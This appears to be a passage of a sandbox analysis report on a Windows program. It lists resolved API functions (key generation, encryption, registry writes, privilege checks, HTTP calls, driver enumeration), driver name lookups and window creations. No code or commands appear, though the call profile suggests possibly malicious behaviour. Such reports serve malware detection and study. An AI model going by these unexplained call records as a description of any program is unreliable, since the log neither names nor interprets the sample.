Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x74cc5a4b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawTextW, address_out = 0x755925cf True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawTextA, address_out = 0x7559aea1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDC, address_out = 0x755872c4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ReleaseDC, address_out = 0x75587446 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75591341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x755888f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75591361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = FillRect, address_out = 0x75590eb6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x755dfd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x7559ae5f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x755ae061 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x7558b142 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75685689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75684f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleDC, address_out = 0x756854f4 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleBitmap, address_out = 0x75685f49 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetPixel, address_out = 0x7568ccee True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetObjectW, address_out = 0x75686c3a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetPixel, address_out = 0x7568cbfb True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetStockObject, address_out = 0x75684eb8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x7568d41c True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetBkColor, address_out = 0x756852d8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDIBits, address_out = 0x75686001 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75684de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteDC, address_out = 0x756858b3 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateFontW, address_out = 0x7568b600 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetTextColor, address_out = 0x7568522d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x750e40fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x750e469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x750e14d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x750e4304 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetSidSubAuthority, address_out = 0x750e0e24 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetSidSubAuthorityCount, address_out = 0x750e0e0c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetTokenInformation, address_out = 0x750e431c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x750d91ea True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x750ddf14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x750f77cb True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x750de124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x750dc532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x750f779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x750d8ee9 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x750dc51a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x750e46ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x750e468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x750e40e6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x750e412e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x750e157a True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x758c0468 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x758b3c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x758c1e46 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x74f1a8c5 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x74f15d77 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x76b5ab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x76b64fae True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x76b6ba12 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x76b6492c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x76b64a42 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x76b69197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x76b5b406 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x758914cc True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x75891514 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x7718ffc1 True 9
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x750ddfc8 True 919
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x750ddf04 True 3
Fn
Driver (506)
»
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1638160 True 2
Fn
Enumerate - load_addresses = 2293760 True 2
Fn
Enumerate - load_addresses = 1638000 True 1
Fn
Enumerate - load_addresses = 2359296 True 2
Fn
Enumerate - load_addresses = 1638012 True 1
Fn
Get Name - load_address = 42323968 True 4
Fn
Get Name - load_address = 42024960 True 4
Fn
Get Name - load_address = 12156928 True 4
Fn
Get Name - load_address = 13324288 True 4
Fn
Get Name - load_address = 13647872 True 4
Fn
Get Name - load_address = 13729792 True 4
Fn
Get Name - load_address = 15540224 True 4
Fn
Get Name - load_address = 14680064 True 4
Fn
Get Name - load_address = 15351808 True 4
Fn
Get Name - load_address = 16326656 True 4
Fn
Get Name - load_address = 16683008 True 4
Fn
Get Name - load_address = 16719872 True 4
Fn
Get Name - load_address = 14114816 True 4
Fn
Get Name - load_address = 15413248 True 4
Fn
Get Name - load_address = 14323712 True 4
Fn
Get Name - load_address = 14409728 True 4
Fn
Get Name - load_address = 12582912 True 4
Fn
Get Name - load_address = 12959744 True 4
Fn
Get Name - load_address = 15466496 True 4
Fn
Get Name - load_address = 13066240 True 4
Fn
Get Name - load_address = 13238272 True 4
Fn
Get Name - load_address = 14495744 True 4
Fn
Get Name - load_address = 14561280 True 4
Fn
Get Name - load_address = 17539072 True 4
Fn
Get Name - load_address = 17850368 True 4
Fn
Get Name - load_address = 18939904 True 4
Fn
Get Name - load_address = 17932288 True 4
Fn
Get Name - load_address = 20656128 True 4
Fn
Get Name - load_address = 18317312 True 4
Fn
Get Name - load_address = 20766720 True 4
Fn
Get Name - load_address = 20836352 True 4
Fn
Get Name - load_address = 21327872 True 4
Fn
Get Name - load_address = 22323200 True 4
Fn
Get Name - load_address = 22716416 True 4
Fn
Get Name - load_address = 23310336 True 4
Fn
Get Name - load_address = 25423872 True 4
Fn
Get Name - load_address = 25726976 True 4
Fn
Get Name - load_address = 25792512 True 4
Fn
Get Name - load_address = 26103808 True 4
Fn
Get Name - load_address = 26136576 True 4
Fn
Get Name - load_address = 26374144 True 4
Fn
Get Name - load_address = 26447872 True 4
Fn
Get Name - load_address = 26484736 True 4
Fn
Get Name - load_address = 26722304 True 4
Fn
Get Name - load_address = 26812416 True 4
Fn
Get Name - load_address = 23240704 True 4
Fn
Get Name - load_address = 23277568 True 4
Fn
Get Name - load_address = 23068672 True 4
Fn
Get Name - load_address = 22892544 True 4
Fn
Get Name - load_address = 23126016 True 4
Fn
Get Name - load_address = 23191552 True 4
Fn
Get Name - load_address = 20971520 True 4
Fn
Get Name - load_address = 21008384 True 4
Fn
Get Name - load_address = 21045248 True 4
Fn
Get Name - load_address = 21090304 True 4
Fn
Get Name - load_address = 21159936 True 4
Fn
Get Name - load_address = 20877312 True 4
Fn
Get Name - load_address = 16777216 True 4
Fn
Get Name - load_address = 56893440 True 4
Fn
Get Name - load_address = 57176064 True 4
Fn
Get Name - load_address = 57212928 True 4
Fn
Get Name - load_address = 57368576 True 4
Fn
Get Name - load_address = 57430016 True 4
Fn
Get Name - load_address = 57540608 True 4
Fn
Get Name - load_address = 57622528 True 4
Fn
Get Name - load_address = 57954304 True 4
Fn
Get Name - load_address = 58003456 True 4
Fn
Get Name - load_address = 58048512 True 4
Fn
Get Name - load_address = 58109952 True 4
Fn
Get Name - load_address = 56623104 True 4
Fn
Get Name - load_address = 56745984 True 4
Fn
Get Name - load_address = 17338368 True 4
Fn
Get Name - load_address = 56815616 True 4
Fn
Get Name - load_address = 61476864 True 4
Fn
Get Name - load_address = 61624320 True 4
Fn
Get Name - load_address = 61693952 True 4
Fn
Get Name - load_address = 62193664 True 4
Fn
Get Name - load_address = 62283776 True 4
Fn
Get Name - load_address = 62349312 True 4
Fn
Get Name - load_address = 62439424 True 4
Fn
Get Name - load_address = 62586880 True 4
Fn
Get Name - load_address = 62636032 True 4
Fn
Get Name - load_address = 60817408 True 4
Fn
Get Name - load_address = 60928000 True 4
Fn
Get Name - load_address = 61063168 True 4
Fn
Get Name - load_address = 61169664 True 4
Fn
Get Name - load_address = 61214720 True 4
Fn
Get Name - load_address = 61276160 True 4
Fn
Get Name - load_address = 61337600 True 4
Fn
Get Name - load_address = 63676416 True 4
Fn
Get Name - load_address = 63950848 True 4
Fn
Get Name - load_address = 64024576 True 4
Fn
Get Name - load_address = 64393216 True 4
Fn
Get Name - load_address = 64479232 True 4
Fn
Get Name - load_address = 62914560 True 4
Fn
Get Name - load_address = 63164416 True 4
Fn
Get Name - load_address = 63303680 True 4
Fn
Get Name - load_address = 63328256 True 4
Fn
Get Name - load_address = 63385600 True 4
Fn
Get Name - load_address = 63434752 True 4
Fn
Get Name - load_address = 63479808 True 4
Fn
Get Name - load_address = 131072 True 4
Fn
Get Name - load_address = 63557632 True 4
Fn
Get Name - load_address = 5046272 True 4
Fn
Get Name - load_address = 63606784 True 4
Fn
Get Name - load_address = 7667712 True 4
Fn
Get Name - load_address = 10223616 True 4
Fn
Get Name - load_address = 64856064 True 4
Fn
Get Name - load_address = 61345792 True 4
Fn
Get Name - load_address = 64913408 True 4
Fn
Get Name - load_address = 64950272 True 4
Fn
Get Name - load_address = 62828544 True 4
Fn
Get Name - load_address = 27009024 True 4
Fn
Get Name - load_address = 64958464 True 4
Fn
Get Name - load_address = 27152384 True 4
Fn
Get Name - load_address = 44417024 True 2
Fn
Get Name - load_address = 44515328 True 2
Fn
Get Name - load_address = 45338624 True 2
Fn
Get Name - load_address = 45461504 True 2
Fn
Get Name - load_address = 45559808 True 2
Fn
Get Name - load_address = 45744128 True 2
Fn
Get Name - load_address = 44040192 True 2
Fn
Get Name - load_address = 67641344 True 2
Fn
Get Name - load_address = 68321280 True 2
Fn
Get Name - load_address = 68366336 True 2
Fn
Get Name - load_address = 68567040 True 2
Fn
Get Name - load_address = 68640768 True 2
Fn
Get Name - load_address = 72155136 True 2
Fn
Get Name - load_address = 72781824 True 2
Fn
Get Name - load_address = 72929280 True 2
Fn
Get Name - load_address = 71303168 True 2
Fn
Get Name - load_address = 1995374592 True 2
Fn
Get Name - load_address = 1211957248 True 2
Fn
Get Name - load_address = 4280352768 True 2
Fn
Window (257)
»
Operation Window Name Additional Information Success Count Logfile
Create - wndproc_parameter = 0 True 1
Fn
Create - class_name = ExtraWnd1, wndproc_parameter = 0 True 1
Fn
Create - class_name = ExtraWnd2, wndproc_parameter = 0 True 1
Fn
Create - class_name = #32768, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Create aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
